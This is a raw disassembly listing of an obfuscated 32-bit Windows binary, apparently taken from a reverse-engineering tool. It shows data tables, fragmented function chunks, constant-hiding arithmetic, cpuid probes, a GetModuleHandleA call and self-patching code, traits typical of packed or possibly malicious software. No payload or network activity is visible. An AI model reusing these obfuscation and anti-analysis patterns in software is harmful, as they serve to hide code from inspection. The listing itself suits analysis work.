dword_425BD4 dd 2 ; DATA XREF: sub_427849:loc_423802�r
; _94j21ax3:loc_424653�r ...
dd 3 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_425FD4: ; CODE XREF: sub_42AE5A-8AF5�j
jmp loc_427A55
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
db 5, 2Bh, 33h
dword_425FDC dd 2 ; DATA XREF: sub_423324+8FE7�r
dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1, 4AC1E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EFA
loc_4263E1: ; CODE XREF: sub_424EFA+8�j
jmp loc_429E4B
; END OF FUNCTION CHUNK FOR sub_424EFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_4263E6: ; CODE XREF: sub_423A56+3A91�j
ja loc_424D6F
xor edx, 93CCAABDh
loc_4263F2: ; CODE XREF: sub_423A56:loc_428E53�j
mov eax, [ebp-4]
xor edx, edx
call sub_42540A
loc_4263FC: ; CODE XREF: _94j21ax3:004248BD�j
jmp loc_42AF2D
; END OF FUNCTION CHUNK FOR sub_423A56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254AE
loc_426401: ; CODE XREF: sub_4254AE:loc_4290D0�j
pop ebp
mov eax, ds:dword_424080
call sub_421F28
loc_42640D: ; CODE XREF: sub_4210BC+6�j
jmp nullsub_66
; END OF FUNCTION CHUNK FOR sub_4254AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A4F
loc_426412: ; CODE XREF: sub_421A4F:loc_421A5E�j
mov eax, ds:dword_42C214
or eax, eax
jnz loc_421362
push offset loc_4279FF
jmp loc_42B879
; END OF FUNCTION CHUNK FOR sub_421A4F
; ---------------------------------------------------------------------------
adc ebx, edx
jmp sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_426431: ; CODE XREF: sub_422973+8053�j
jnz loc_42B660
jmp loc_42710E
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_42643C: ; CODE XREF: sub_425934+3BDC�j
; sub_425934:loc_42C239�j
call sub_426612
mov edx, 0A70158B4h
call sub_4239A5
call sub_4231CD
loc_426450: ; CODE XREF: sub_429EDB+20B4�j
push 794A34E5h
loc_426455: ; CODE XREF: sub_429EDB:loc_42A654�j
push offset sub_4236AF
jmp loc_429F63
; END OF FUNCTION CHUNK FOR sub_425934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42645F: ; CODE XREF: sub_421689+8C75�j
and eax, ecx
mov ecx, edi
sub edx, edi
sub ebx, esi
jmp loc_42BC0C
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
rol esi, 18h
jns sub_42A277
; START OF FUNCTION CHUNK FOR sub_425324
loc_426475: ; CODE XREF: sub_425324:loc_4230D0�j
jmp sub_429CCA
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
jmp locret_421410
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_426480: ; CODE XREF: sub_42284F+9CE8�j
jmp loc_428073
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_426485: ; CODE XREF: sub_4217DC+2�j
; sub_428F6D-4C93�j ...
jo loc_4268AF
call sub_42C057
test al, al
jz loc_428C36
push eax
push 5906069Dh
jmp loc_42910E
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
loc_4264A3: ; CODE XREF: _94j21ax3:00424CB9�j
jz loc_42ACA3
jmp loc_427413
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4264AF proc near ; CODE XREF: sub_428B74�j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
mov ebp, offset sub_423A33
xchg ebp, [esp+0]
jmp nullsub_61
sub_4264AF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_4264C2: ; CODE XREF: sub_422AD5+505B�j
push esi
loc_4264C3: ; CODE XREF: sub_422AD5:loc_426591�j
call sub_42574E
push offset loc_428893
jmp loc_42936A
; END OF FUNCTION CHUNK FOR sub_422AD5
; ---------------------------------------------------------------------------
push offset sub_422436
jmp loc_427890
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4264DC: ; CODE XREF: sub_421402:loc_421CD6�j
pushf
push 68A867E9h
pop edi
add edi, 97579C17h
popf
jmp loc_4214BB
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_4264EF: ; CODE XREF: sub_422CA6+2�j
push edx
push 488D6D8Ah
pop edx
add edx, 0B7B553B2h
xchg edx, [esp+4+var_4]
jmp loc_426621
; END OF FUNCTION CHUNK FOR sub_422CA6
; ---------------------------------------------------------------------------
loc_426504: ; CODE XREF: _94j21ax3:loc_42A837�j
jnz loc_425B54
jmp loc_426547
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42266A
loc_42650F: ; CODE XREF: sub_42266A+8�j
jnz loc_427C40
jmp loc_429585
; END OF FUNCTION CHUNK FOR sub_42266A
; =============== S U B R O U T I N E =======================================
sub_42651A proc near ; CODE XREF: sub_424EE4+2�p
; _94j21ax3:004284F2�p ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004296AA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B642 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B737 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B8CC SIZE 00000005 BYTES
jo loc_426535
push offset sub_4284C0
jmp loc_42B8CC
; ---------------------------------------------------------------------------
loc_42652A: ; DATA XREF: sub_426B65+16�o
call sub_4239A5
push eax
jmp loc_4258E6
; ---------------------------------------------------------------------------
loc_426535: ; CODE XREF: sub_42651A�j
push ebp
mov ebp, esp
call sub_42B1BB
loc_42653D: ; CODE XREF: sub_42C2E2+11�j
jmp loc_42B737
sub_42651A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_426542: ; CODE XREF: _94j21ax3:004297B4�j
jmp locret_4275DA
; ---------------------------------------------------------------------------
loc_426547: ; CODE XREF: _94j21ax3:0042650A�j
jmp loc_422D6C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_42654C: ; CODE XREF: sub_429A83-5B8C�j
jmp loc_4282A3
; END OF FUNCTION CHUNK FOR sub_429A83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C51
loc_426552: ; CODE XREF: sub_423C51:loc_422D81�j
push offset loc_42C104
jmp nullsub_160
; END OF FUNCTION CHUNK FOR sub_423C51
; ---------------------------------------------------------------------------
popf
jmp loc_428DA0
; =============== S U B R O U T I N E =======================================
sub_426562 proc near ; CODE XREF: sub_423278�j
; DATA XREF: sub_42AA07:loc_42326E�o
call sub_425324
or eax, eax
jnz locret_426574
loc_42656F: ; CODE XREF: sub_42AA07+6�j
call sub_42983E
locret_426574: ; CODE XREF: sub_426562+7�j
retn
sub_426562 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B396
loc_426575: ; CODE XREF: sub_42B396+5�j
jmp nullsub_204
; END OF FUNCTION CHUNK FOR sub_42B396
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC2D
loc_42657A: ; CODE XREF: sub_42AC2D+23�j
jmp loc_421A87
; END OF FUNCTION CHUNK FOR sub_42AC2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_42657F: ; CODE XREF: sub_42B238:loc_4251ED�j
cmp dword ptr [ebp-4], 100h
jnz loc_422A56
jmp loc_422A7B
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_426591: ; CODE XREF: sub_422AD5:loc_4255BA�j
jz loc_4264C3
jmp loc_42110F
; END OF FUNCTION CHUNK FOR sub_422AD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42659C: ; CODE XREF: sub_423FCD:loc_428745�j
cpuid
and eax, 0FFFh
add [esi], eax
xor [esi], edx
mov eax, 80000000h
cpuid
jmp loc_429A9F
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_4265B3: ; DATA XREF: sub_4290C0+7�o
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_4265B7: ; CODE XREF: sub_42C057-1504�j
jmp loc_421204
; END OF FUNCTION CHUNK FOR sub_42C057
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423284
loc_4265BD: ; CODE XREF: sub_423284+6�j
jmp loc_4224EA
; END OF FUNCTION CHUNK FOR sub_423284
; =============== S U B R O U T I N E =======================================
sub_4265C2 proc near ; CODE XREF: sub_42A7A6:loc_428509�j
; sub_428381+3AD8�p
; FUNCTION CHUNK AT 00426E23 SIZE 0000000B BYTES
push 0AB20A00Ah
pop eax
and eax, 28B0F8BAh
jmp loc_426E23
sub_4265C2 endp
; ---------------------------------------------------------------------------
push 5B3C1595h
pop eax
add eax, 0BDC72B40h
xor eax, 0F1322A79h
jmp loc_42AE1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B314
loc_4265EA: ; CODE XREF: sub_42B314+13�j
call sub_423FCD
loc_4265EF: ; CODE XREF: sub_4272E9-1D12�j
jmp loc_423D42
; END OF FUNCTION CHUNK FOR sub_42B314
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_4265F4: ; CODE XREF: sub_4259BF-3DE3�j
; sub_4259BF:loc_422773�j
cmp dword ptr [ebp-10h], 0
push offset loc_424945
jmp loc_421EF5
; END OF FUNCTION CHUNK FOR sub_4259BF
; =============== S U B R O U T I N E =======================================
sub_426602 proc near ; CODE XREF: sub_425983-18C5�p
; _94j21ax3:0042539C�j
xchg edi, [esp+0]
pop edi
mov ds:dword_4256C0, eax
retn
sub_426602 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42660D: ; CODE XREF: sub_42972F+1D82�j
jmp loc_428677
; END OF FUNCTION CHUNK FOR sub_42972F
; =============== S U B R O U T I N E =======================================
sub_426612 proc near ; CODE XREF: sub_424320:loc_423DCB�p
; sub_425983:loc_4240AB�p ...
; FUNCTION CHUNK AT 0042B43A SIZE 00000005 BYTES
jns sub_422538
push ebp
mov ebp, esp
jmp loc_42B43A
sub_426612 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_426621: ; CODE XREF: sub_422CA6+3859�j
jmp sub_426B3C
; END OF FUNCTION CHUNK FOR sub_422CA6
; =============== S U B R O U T I N E =======================================
sub_426626 proc near ; CODE XREF: sub_421D33+98BF�p
; _94j21ax3:0042C5BB�j
; FUNCTION CHUNK AT 0042474E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428443 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FC8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B80E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BC61 SIZE 0000001D BYTES
mov [esp+0], eax
pop eax
mov [ebp-20h], eax
jmp loc_42474E
sub_426626 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_426632: ; CODE XREF: sub_421D33:loc_42B511�j
test byte ptr [ebp-7], 8
jz loc_42C550
push ebp
call sub_42764C
loc_426642: ; CODE XREF: sub_424902:loc_427FA2�j
add edx, 0FC8A26BDh
xchg edx, [esp+28h+var_28]
jmp sub_42C057
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_426650: ; CODE XREF: sub_42C1AE-A570�j
test edx, 82BF5D4Ah
jmp loc_425896
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42665B: ; CODE XREF: sub_423614-51E�j
; sub_423614:loc_42AE88�j
pop ecx
mov ebp, offset nullsub_207
call sub_4251D5
xchg eax, edi
push edi
xchg eax, edi
loc_42666B: ; CODE XREF: _94j21ax3:loc_423888�j
ror eax, 10h
push esi
push 0EE1D3DA0h
pop esi
add esi, 12258490h
jmp loc_428BAC
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_426680: ; CODE XREF: sub_423324:loc_423421�j
jnz loc_42201C
jmp loc_426D2D
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42668B: ; CODE XREF: sub_42169F-8C�j
mov ebx, ebp
popf
loc_42668E: ; CODE XREF: sub_42169F:loc_42B7E4�j
call nullsub_6
retn
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_426694: ; CODE XREF: sub_423F55+38B5�j
jmp loc_427E01
; END OF FUNCTION CHUNK FOR sub_423F55
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42669A: ; CODE XREF: sub_42169F+384�j
; _94j21ax3:0042768D�j
call sub_42C057
jmp loc_42A6A8
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
loc_4266A4: ; CODE XREF: _94j21ax3:00423ADE�j
add ebx, 0DCCCD51Bh
call sub_4252F6
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_4266AF: ; CODE XREF: sub_422FDC+7990�j
jmp loc_4232BD
; END OF FUNCTION CHUNK FOR sub_422FDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427679
loc_4266B4: ; CODE XREF: sub_427679:loc_422EE5�j
movzx edx, byte ptr [ecx+edx]
and eax, edx
; END OF FUNCTION CHUNK FOR sub_427679
; START OF FUNCTION CHUNK FOR sub_42484C
loc_4266BA: ; CODE XREF: sub_42484C:loc_42312A�j
jz loc_42BFCA
jmp loc_429A61
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
loc_4266C5: ; CODE XREF: _94j21ax3:00422EDA�j
jge loc_428DE7
loc_4266CB: ; CODE XREF: _94j21ax3:00422B8A�j
sub edx, 0BEB8328h
xor edx, 266D41D0h
call sub_4239A5
call sub_42574E
call sub_42A092
; START OF FUNCTION CHUNK FOR sub_4225A5
loc_4266E6: ; CODE XREF: sub_4225A5+775B�j
jmp loc_4280DE
; END OF FUNCTION CHUNK FOR sub_4225A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42773C
loc_4266EB: ; CODE XREF: sub_42773C+28E1�j
call sub_421A4F
locret_4266F0: ; CODE XREF: sub_422EB0+3E3F�j
retn
; END OF FUNCTION CHUNK FOR sub_42773C
; ---------------------------------------------------------------------------
loc_4266F1: ; CODE XREF: _94j21ax3:00427A0F�j
jmp loc_4297A8
; =============== S U B R O U T I N E =======================================
sub_4266F6 proc near ; CODE XREF: sub_42265F+1�p
; _94j21ax3:00427D29�j
; FUNCTION CHUNK AT 004280E0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428324 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042C5C1 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 0F0AFEEA2h
pop eax
jmp loc_428324
sub_4266F6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42670B: ; CODE XREF: _94j21ax3:00429FB7�j
jnz loc_42A2BC
jmp loc_428F05
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426716 proc near ; DATA XREF: sub_42A61F:loc_42374A�o
var_18 = byte ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0042102B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00421D8B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423E83 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004277D5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428EED SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A229 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AAFE SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
call sub_42771C
loc_42671F: ; CODE XREF: sub_428381+1ECE�j
ja loc_421D8B
pushf
jmp loc_4277D5
sub_426716 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42672B: ; CODE XREF: sub_42B9CF-1F7�j
jnz loc_42B1EC
jmp loc_423632
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_426736: ; DATA XREF: sub_421457:loc_42A4D2�o
rol eax, 0Dh
push offset loc_422C37
jmp loc_427613
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_426744 proc near ; CODE XREF: _94j21ax3:00426E1E�j
; sub_42851E+C�p
; FUNCTION CHUNK AT 00421DF8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042394B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429DAC SIZE 00000016 BYTES
xchg esi, [esp+0]
pop esi
mov ebp, [eax]
add eax, 4
mov edx, [eax]
mov al, 1
call edx ; GetModuleHandleA
jmp loc_428B9C
sub_426744 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jbe loc_428108
jmp loc_429892
; ---------------------------------------------------------------------------
loc_426763: ; DATA XREF: sub_42960D+12�o
xor eax, 0ECD7CAFEh
and ecx, eax
pop eax
pushf
push 474D3948h
loc_426772: ; CODE XREF: _94j21ax3:loc_42745F�j
pop eax
jmp loc_423C28
; ---------------------------------------------------------------------------
loc_426778: ; CODE XREF: _94j21ax3:loc_422F24�j
add edx, 22EE30BFh
cmp edx, 3D6BA2C7h
jmp loc_423827
; ---------------------------------------------------------------------------
locret_426789: ; CODE XREF: _94j21ax3:0042442E�j
retn
; =============== S U B R O U T I N E =======================================
sub_42678A proc near ; CODE XREF: _94j21ax3:004228E4�j
; sub_42678A+1658�p
; FUNCTION CHUNK AT 004238E4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004277B8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00427DD9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429330 SIZE 00000009 BYTES
mov [esp+0], esi
pop esi
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_42933E
call sub_4269EC
jnz loc_427DD9
mov ecx, [ebx+edx-4]
jmp loc_4277A8
sub_42678A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_4267AE: ; CODE XREF: sub_421689:loc_42B1E7�j
jnz loc_422633
; END OF FUNCTION CHUNK FOR sub_421689
; START OF FUNCTION CHUNK FOR sub_42328F
loc_4267B4: ; CODE XREF: sub_42328F+EEE�j
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_42328F
; ---------------------------------------------------------------------------
jns locret_42B1F1
sub ebp, esi
jmp loc_422633
; =============== S U B R O U T I N E =======================================
sub_4267C6 proc near ; CODE XREF: _94j21ax3:0042A3FE�j
; sub_428BBD+1B0B�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004224BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A2A SIZE 00000018 BYTES
mov [esp+0], eax
push ebx
push 0B84A0355h
pop ebx
and ebx, 31F6A56Dh
xor ebx, 30420141h
jmp loc_4224BA
sub_4267C6 endp
; ---------------------------------------------------------------------------
loc_4267E1: ; CODE XREF: _94j21ax3:00425691�j
pop ebx
xchg eax, [esp]
mov edx, eax
pop eax
loc_4267E8: ; CODE XREF: _94j21ax3:00428018�j
pop eax
; START OF FUNCTION CHUNK FOR sub_425819
loc_4267E9: ; CODE XREF: sub_425819:loc_425053�j
mov ebp, offset loc_426485
xchg ebp, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
loc_4267F2: ; DATA XREF: sub_425790-41D3�o
call sub_42574E
mov edx, 0DD5E106Fh
call sub_4239A5
pushf
jmp loc_4280F6
; ---------------------------------------------------------------------------
loc_426807: ; CODE XREF: _94j21ax3:004226D0�j
mov [esi], eax
; =============== S U B R O U T I N E =======================================
sub_426809 proc near ; CODE XREF: _94j21ax3:004284FF�p
; FUNCTION CHUNK AT 004210A0 SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
push eax
jmp loc_4210A0
sub_426809 endp
; ---------------------------------------------------------------------------
loc_426813: ; CODE XREF: _94j21ax3:00426B2F�j
add ebp, 80664A5Ch
loc_426819: ; CODE XREF: _94j21ax3:loc_426B19�j
rol ebx, 6
add ebx, 0DD3C865Dh
xchg ebx, [esp]
jmp loc_426E57
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42682A: ; CODE XREF: sub_4294B3-420F�j
pop edi
test ebx, esi
jmp loc_426DC0
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B238
loc_426832: ; CODE XREF: sub_42B238+18�j
xor edx, 232DBD2Fh
add edx, ebp
add edx, 0A039C696h
mov edx, [edx]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
jmp loc_4251ED
; END OF FUNCTION CHUNK FOR sub_42B238
; ---------------------------------------------------------------------------
shr ebx, 1Ch
jmp sub_42A770
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_426856: ; CODE XREF: sub_424C37:loc_426CCF�j
xchg esi, eax
or ebx, 0BC9ED975h
pushf
jmp loc_4296E2
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D58
loc_426864: ; CODE XREF: sub_424D58+18�j
add esi, 0BF6601BFh
xchg esi, [esp+0Ch+var_C]
jmp loc_428C31
; END OF FUNCTION CHUNK FOR sub_424D58
; ---------------------------------------------------------------------------
mov edx, 24CC2B1h
call sub_4239A5
push eax
ror eax, 0Eh
push ebx
push 0CAE90BE8h
jmp loc_42585C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42688B: ; CODE XREF: sub_421689+1C67�j
sub ebp, edx
sub edi, 0F07EA2A1h
sub edi, eax
jmp loc_421714
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_42689A: ; CODE XREF: sub_423BF8:loc_428E83�j
push 69EC1C5Dh
pop eax
add eax, 96563F67h
loc_4268A6: ; CODE XREF: sub_4294B3:loc_424A18�j
mov eax, [eax]
jmp loc_429E24
; END OF FUNCTION CHUNK FOR sub_423BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4268AF: ; CODE XREF: sub_42169F:loc_426485�j
call sub_42C057
test al, al
jz loc_428C36
call sub_42C149
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_4268C1 proc near ; CODE XREF: sub_421402+2E�j
; sub_4237DC:loc_4280BC�p
; FUNCTION CHUNK AT 00425588 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426D0B SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-0Ch]
movzx eax, byte ptr [eax]
add [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Ah
add [ebp-8], eax
jmp loc_425588
sub_4268C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4268DC: ; CODE XREF: sub_4294B3:loc_422133�j
cmp dword ptr [ebp-8], 0
jz loc_421933
jmp loc_42529E
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_4268EB: ; CODE XREF: sub_428993-5D3�j
not ecx
or esi, ecx
and ebx, 861EA492h
jz loc_4234B2
jmp loc_42A750
; END OF FUNCTION CHUNK FOR sub_428993
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_426901: ; CODE XREF: sub_424775-91B�j
push 0D7751B40h
loc_426906: ; CODE XREF: _94j21ax3:0042906F�j
pop eax
add eax, 46B57842h
add eax, ebp
loc_42690F: ; CODE XREF: sub_421F28:loc_427905�j
add eax, 0E1D56C76h
jmp loc_427232
; ---------------------------------------------------------------------------
loc_42691A: ; CODE XREF: sub_424775+31E5�j
mov eax, [ebp-30h]
push eax
jmp loc_423E53
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
loc_426923: ; CODE XREF: _94j21ax3:0042A49D�j
add esp, 0FFFFFFCCh
lea eax, nullsub_9
mov byte ptr [eax], 0C3h
mov [ebp-4], eax
push 1Ch
lea eax, [ebp-34h]
jmp loc_426E94
; ---------------------------------------------------------------------------
locret_42693C: ; CODE XREF: _94j21ax3:loc_4282E6�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428FFB
loc_42693D: ; CODE XREF: sub_428FFB+10�j
jmp loc_422138
; END OF FUNCTION CHUNK FOR sub_428FFB
; ---------------------------------------------------------------------------
word_426942 dw 0C7C1h ; DATA XREF: _94j21ax3:00427C09�o
dd 0DAC78117h, 681B0BF4h
dd offset sub_42BD16
dd 0FFEBB9E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_426955: ; CODE XREF: sub_422866:loc_423002�j
add eax, 0A40AF58Eh
add eax, ebp
add eax, 73F58CB1h
call sub_428205
loc_426968: ; CODE XREF: sub_42AE5A:loc_429478�j
xor esi, 0D22635DEh
sub esi, 0CF7C6CCDh
xor esi, 54A0F2BCh
popf
cmp edx, esi
loc_42697D: ; CODE XREF: _94j21ax3:0042C0F9�j
pop esi
and ecx, ebx
jmp loc_428F7C
; END OF FUNCTION CHUNK FOR sub_422866
; =============== S U B R O U T I N E =======================================
